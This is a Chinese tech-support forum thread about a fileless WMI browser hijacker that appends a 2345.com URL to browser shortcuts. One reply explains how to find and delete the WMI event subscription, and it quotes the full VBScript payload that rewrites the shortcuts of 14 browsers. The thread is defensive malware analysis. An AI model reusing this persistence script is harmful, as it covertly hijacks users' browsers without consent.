本帖最后由 仁二 于 2016-7-15 19:24 编辑  搞不懂为什么要用2345游览器……你的情况给scrcons.exe上个监控什么启动他的 或者火绒剑监控看看 |
|
本帖最后由 dfsafds 于 2016-6-30 23:31 编辑 按以下步骤打开控制面板—本地安全策略—软件限制策略——其他规则,点鼠标右键,新建散列规则(XP中好象是这个名称)、或新建哈希规则(win7),禁止WINDOWS\SYSTEM32\WBEM\scrcons.exe的运行,不知道行不行,正在试验中,本人觉得应该可以的,而且一劳永逸的解决WMI脚本木马问题。这个WMI脚本功能就是一个垃圾。近来下载了几个小游戏,一安装,结果就中招了,发现浏览器主页屡被改。百度杀毒一点提示也没有。 
|
dfgdsfg 发表于 2016-3-16 17:15 已经很不错了,金山没起一点作用,我本来不想重装(以前是正版的家庭版WIN7) |
wyiznxfn 发表于 2016-3-16 10:43 火绒隔段时间就会提示拦截scrcons.exe对桌面浏览器快捷方式的修改,但是不能彻底清除! |
我之前也是这样,是一个2345.com/xxxxx,隔段时间就把所有浏览器快捷方式都改了(包括360浏览器,搜狗浏览器,115浏览器,IE浏览器),网上搜答案,WMI中的计时器中没有那个项目,不管什么都删了也不行。之前用金山的,根本拦截不了快捷方式更改,逼不得已重装系统,然后换了火绒 |
FLY_MC 发表于 2016-3-10 19:36 这篇文章看过的,问题是根本就没有 _EventFilter:Name="unown_filter" 的选项... |
|
搜到解决方法 查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装 http://www.microsoft.com/en-us/download/details.aspx?id=24045 安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定,出现下图: 点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",选择view instant properties,如下图: 查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。 受到影响的浏览器有(各色浏览器,差不多齐了): "IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe" 具体代码如下: On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If 最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除! 删不掉? 到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之! 还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉! 暂时就这么多了,还有没有其它影响的话,用用再看吧! 解决方法来自:Gemini |
| 看下scrcons.exe的路径 |
dfgdsfg 发表于 2016-2-28 22:08 改成已禁用 |
zgy3073 发表于 2016-3-4 23:15 针对scrcon.exe下手?  scrcons.exe是系统自带的,怎么修改? 这种病毒主要是利用WMI中的计时器使用VBS脚本文件来自启动,不写注册表,不增加服务,非常隐蔽!这里的scrcons.exe仍是正常的系统文件,只是被病毒当作跳板给利用了。 如果火绒可以跟踪scrcons.exe对应调用的脚本进行清除就完美了! |
dfgdsfg 发表于 2016-3-3 21:34 隔段时间提示,说明scrcon.exe的流氓行为存在,他不甘心,所以会不停地去修改。但是并不代表他成功了。 如果想没有提示,要针对scrcon.exe下手才行,只更换快捷方式是没有用的。 |
|
带尾巴的快捷方式已经手动删除了,现在是浏览器重新在桌面建立了一个快捷方式。火绒会提示拦截scrcons.exe对桌面浏览器快捷方式的修改,但全盘扫描过未见有何清除。 事实上应该也未能清除,否则也不会隔段时间就提示拦截scrcons.exe对桌面浏览器快捷方式的修改  |
dfgdsfg 发表于 2016-3-2 16:22 如果是拦截了修改,那就没有修改成功了。 但之前的被修改的快捷方式,火绒应该是可以查杀的,如果不能查杀,麻烦把这个快捷方式在回复中上传下吧,工程师会分析下。 谢谢! |
dfgdsfg 发表于 2016-2-28 22:08 方便的话加一下qq,远程让工程师帮您解决下 |
组图打开中,请稍候......